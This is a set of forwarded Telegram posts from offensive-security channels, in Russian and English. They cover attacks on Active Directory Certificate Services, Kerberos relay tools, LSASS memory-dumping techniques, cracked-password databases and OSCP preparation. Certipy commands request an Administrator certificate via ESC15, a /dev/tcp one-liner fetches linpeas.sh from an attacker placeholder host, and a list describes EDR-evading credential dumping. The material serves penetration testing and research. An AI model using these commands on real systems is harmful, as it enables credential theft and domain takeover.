Forwarded from SecuriXy.kz
В certipy завезли новый вектор атаки #ESC15 на центр сертификации ADCS, которая использует специфические настройки шаблонов сертификатов, которые соответствуют большинству первичных условий атаки ESC1 или на ESC3, а именно:
1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.
Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.
Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:
2. Запрос сертификата с указанием OID для ‘Client Authentication’:
-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.
https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47
1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.
Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.
Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:
certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies 'Client Authentication'
2. Запрос сертификата с указанием OID для ‘Client Authentication’:
certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies '1.3.6.1.5.5.7.3.2'
-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.
https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
Weakpass 4
A collection of password lists for various purposes from penetration testing to improving password security.
Crack-JS - hash cracking immediately and only with your browser.
Hash lookup - find passwords for hashes like MD5, NTLM, SHA1, and SHA256.
Password Generator - generate a wordlist based on a set of words entered by the user and rules.
P.S. Just to mention another great work and compilation of wordlists: https://github.com/berzerk0/Probable-Wordlists
A collection of password lists for various purposes from penetration testing to improving password security.
Crack-JS - hash cracking immediately and only with your browser.
Hash lookup - find passwords for hashes like MD5, NTLM, SHA1, and SHA256.
Password Generator - generate a wordlist based on a set of words entered by the user and rules.
P.S. Just to mention another great work and compilation of wordlists: https://github.com/berzerk0/Probable-Wordlists
👍2
Forwarded from 1N73LL1G3NC3
Kerberos relaying from SMB to ADCS. Especially great when ESC8 was mitigated by disabling NTLM auth on the ADCS server.
Powered by:
https://github.com/decoder-it/KrbRelay-SMBServer/
https://github.com/wh04m1001/dfscoerce
https://github.com/CCob/gssapi-abuse
Powered by:
https://github.com/decoder-it/KrbRelay-SMBServer/
https://github.com/wh04m1001/dfscoerce
https://github.com/CCob/gssapi-abuse
Forwarded from Russian OSINT
💻 F.A.C.C.T. выпустила подробное исследование группировки «двойного назначения» Shadow/Twelve, которая активно атакует 🇷🇺 российские организации.
Обнаруженный преступный синдикат продемонстрировал тенденцию — группы «двойного назначения»:
💠 Shadow заинтересована в 🔒 вымогательстве денег.
💠 Twelve стремилась к полному ⚠️ разрушению ИТ-инфраструктуры своих жертв.
Одним из фирменных приемов группы стала кража учетных записей в🛡 Telegram на устройствах жертв, что после проведения атак позволяло им шпионить за сотрудниками атакованной компании и оказывать дополнительное давление.
Исследование может быть полезно руководителям групп кибербезопасности, аналитикам SOC, CERT, специалистам по реагированию на инциденты, Threat Intelligence и Threat Hunting, а также компаниям из различных секторов для подготовки проактивной защиты.
https://www.facct.ru/resources/research-hub/shadow-twelve-2024
✋ @Russian_OSINT
Обнаруженный преступный синдикат продемонстрировал тенденцию — группы «двойного назначения»:
Одним из фирменных приемов группы стала кража учетных записей в
Исследование может быть полезно руководителям групп кибербезопасности, аналитикам SOC, CERT, специалистам по реагированию на инциденты, Threat Intelligence и Threat Hunting, а также компаниям из различных секторов для подготовки проактивной защиты.
https://www.facct.ru/resources/research-hub/shadow-twelve-2024
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣1
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.
🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II
🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090
#windows #streaming #kernel #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱2❤1
Forwarded from APT
🔔Call and Register — Relay Attack on WinReg RPC Client
A critical vulnerability (CVE-2024-43532) has been identified in Microsoft’s Remote Registry client. This flaw allows attackers to exploit insecure fallback mechanisms in the WinReg client, enabling them to relay authentication details and make unauthorized certificate requests through Active Directory Certificate Services (ADCS).
🔗 Research:
https://www.akamai.com/blog/security-research/winreg-relay-vulnerability
🔗 RPC Visibility Tool:
https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit/rpc_visibility
🔗 PoC:
https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532
#ad #adcs #rpc #ntlm #relay #etw #advapi
A critical vulnerability (CVE-2024-43532) has been identified in Microsoft’s Remote Registry client. This flaw allows attackers to exploit insecure fallback mechanisms in the WinReg client, enabling them to relay authentication details and make unauthorized certificate requests through Active Directory Certificate Services (ADCS).
🔗 Research:
https://www.akamai.com/blog/security-research/winreg-relay-vulnerability
🔗 RPC Visibility Tool:
https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit/rpc_visibility
🔗 PoC:
https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532
#ad #adcs #rpc #ntlm #relay #etw #advapi
🥱2
Forwarded from Offensive Xwitter
😈 [ Steph @w34kp455 ]
Call it the biggest #NTLM #password database or monstrous #MD5 leak, but on, you can find precomputed datasets for various wordlists and different hashes - all free!
FYI:
🔗 http://weakpass.com
🐥 [ tweet ]
Call it the biggest #NTLM #password database or monstrous #MD5 leak, but on, you can find precomputed datasets for various wordlists and different hashes - all free!
FYI:
all_in_one.latin.txt for NTLM contains 26.5 billion pairs of hash:password inside!🔥🔗 http://weakpass.com
🐥 [ tweet ]
🥱2❤1
Forwarded from offsec notes
Gitlab checks
* Reconnaissance - Link
* Abusing GitLab Runners - Link
* Script for steal tasks by requesting them faster than a real runner - Link
GitHub
GitHub - Frichetten/gitlab-runner-research: Research on abusing GitLab Runners
Research on abusing GitLab Runners. Contribute to Frichetten/gitlab-runner-research development by creating an account on GitHub.
🔥1🥱1
Forwarded from Offensive Xwitter
😈 [ Thomas Roccia 🤘 @fr0gger_ ]
New LOL project, LOLAD a collection of Active Directory techniques!👇
🔗 https://lolad-project.github.io/
🐥 [ tweet ]
New LOL project, LOLAD a collection of Active Directory techniques!👇
🔗 https://lolad-project.github.io/
🐥 [ tweet ]
❤1🥱1
Forwarded from 1N73LL1G3NC3
ShadowDumper
It uses 7 advanced techniques to dump LSASS memory.
Capabilities:
It uses 7 advanced techniques to dump LSASS memory.
Capabilities:
• Unhooked Injection (Modified Mimikatz Binary) – Utilizes unhooking to inject a modified Mimikatz binary, bypassing EDR hooks and evading detection.
• Unhooked Injection (Direct Syscalls with MDWD) – Implements direct syscalls for stealthy injection using MDWD, reducing the footprint left behind.
• Simple MiniDumpWriteDump API – Executes the straightforward MiniDumpWriteDump API method for standard LSASS memory extraction.
• MINIDUMP_CALLBACK_INFORMATION Callbacks – Uses callback functions for custom handling, offering greater control over the dumping process.
• Process Forking Technique – Forks the LSASS process, creating a memory clone and avoiding direct access to the target process.
• Direct Syscalls with MiniDumpWriteDump – Combines direct syscalls with MiniDumpWriteDump, enhancing stealth by avoiding typical API hooks.
• Native Dump with Direct Syscalls (Offline Parsing) – Leverages direct syscalls to create a native dump with essential streams for offline parsing, perfect for low-noise operations.
❤2👍2🔥2🥱1🎃1
Forwarded from cKure Red
https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱1😎1
Forwarded from SecuriXy.kz
Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак.
LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.
#linux #lol #upload #tips
LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.
>exec 3<>/dev/tcp/<kali-ip>/22
>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3
>cat <&3 > linpeas.sh
#linux #lol #upload #tips
🥱3😈2🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Форк знаменитой утилиты certipy with many open pull requests merged, made compatible with each other, and tested
https://github.com/zimedev/certipy-merged
P.S. главное, что tested...
#soft #pentest #adcs #ad
https://github.com/zimedev/certipy-merged
Missing PRs:
211: fix ESC1 false positive
229: add smime extensions support (somehow does not work completely with certipy auth)
Merged PRs:
231: add ldap simple auth
228: add ESC15
226: fix ESC1 false positive
225: fix to solve SID overwrite errors
222: fix to allow certificate names with slashes or parentheses
210: add cross domain authentication
209: accept tgs other than HOST/target@domain
203: check web enrollment for https
201: add dcom support
200: add possibility to add more than 1 keycredential and correctly list them
198: add ldap-port option
196: add ESC13
193: add whencreated and whenmodified for templates
183: hidden import (pycryptodomex)
P.S. главное, что tested...
#soft #pentest #adcs #ad
GitHub
GitHub - zimedev/certipy-merged: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - zimedev/certipy-merged
🥱2
Forwarded from APT
📜 ADCS Attack Techniques Cheatsheet
This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)
🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0
#ad #adcs #esc #cheatsheet
This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)
🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0
#ad #adcs #esc #cheatsheet
Google Docs
ADCS Attack Techniques Cheatsheet
🥱2
Forwarded from Offensive Xwitter
😈 [ ap @decoder_it ]
M'm glad to release the tool I have been working hard on the last month: #KrbRelayEx
A Kerberos relay & forwarder for MiTM attacks!
>Relays Kerberos AP-REQ tickets
>Manages multiple SMB consoles
>Works on Win& Linux with .NET 8.0
>...
GitHub:
🔗 https://github.com/decoder-it/KrbRelayEx
🐥 [ tweet ]
M'm glad to release the tool I have been working hard on the last month: #KrbRelayEx
A Kerberos relay & forwarder for MiTM attacks!
>Relays Kerberos AP-REQ tickets
>Manages multiple SMB consoles
>Works on Win& Linux with .NET 8.0
>...
GitHub:
🔗 https://github.com/decoder-it/KrbRelayEx
🐥 [ tweet ]
🥱1
Forwarded from Path Secure (CuriV)
Хей, хей!
Статья-рефлексия по итогам OSCP c пылу с жару на Хабр.
Получилась довольно хорошо. Рад, что удалось добраться и зафиксировать свой опыт. Содержание статьи:
1. Введение
2. Подготовка
3. Первая попытка
4. Вторая попытка
5. Заключение
6. Конспект обработанных рекомендаций из разных видео по OSCP
Еще загрузил свой читшит. Туда же положу шаблон отчета в формате markdown:
https://github.com/curiv/oscp-cheatsheet
Буду очень рад реакциям, репостам, комментариям и вопросам. Стрим с раззбором все ещё в силе. Заранее сделаю анонс
#certification #oscp #article
Статья-рефлексия по итогам OSCP c пылу с жару на Хабр.
Получилась довольно хорошо. Рад, что удалось добраться и зафиксировать свой опыт. Содержание статьи:
1. Введение
2. Подготовка
3. Первая попытка
4. Вторая попытка
5. Заключение
6. Конспект обработанных рекомендаций из разных видео по OSCP
Еще загрузил свой читшит. Туда же положу шаблон отчета в формате markdown:
https://github.com/curiv/oscp-cheatsheet
Буду очень рад реакциям, репостам, комментариям и вопросам. Стрим с раззбором все ещё в силе. Заранее сделаю анонс
#certification #oscp #article
Хабр
Системный подход к успешной сдаче OSCP 2024
Введение Широко известная в узких кругах организация «Offensive Security» является флагманом в области кибербезопасности, предлагая специалистам уникальные образовательные программы и сертификационные...
❤2🙈2🥴1🙉1🙊1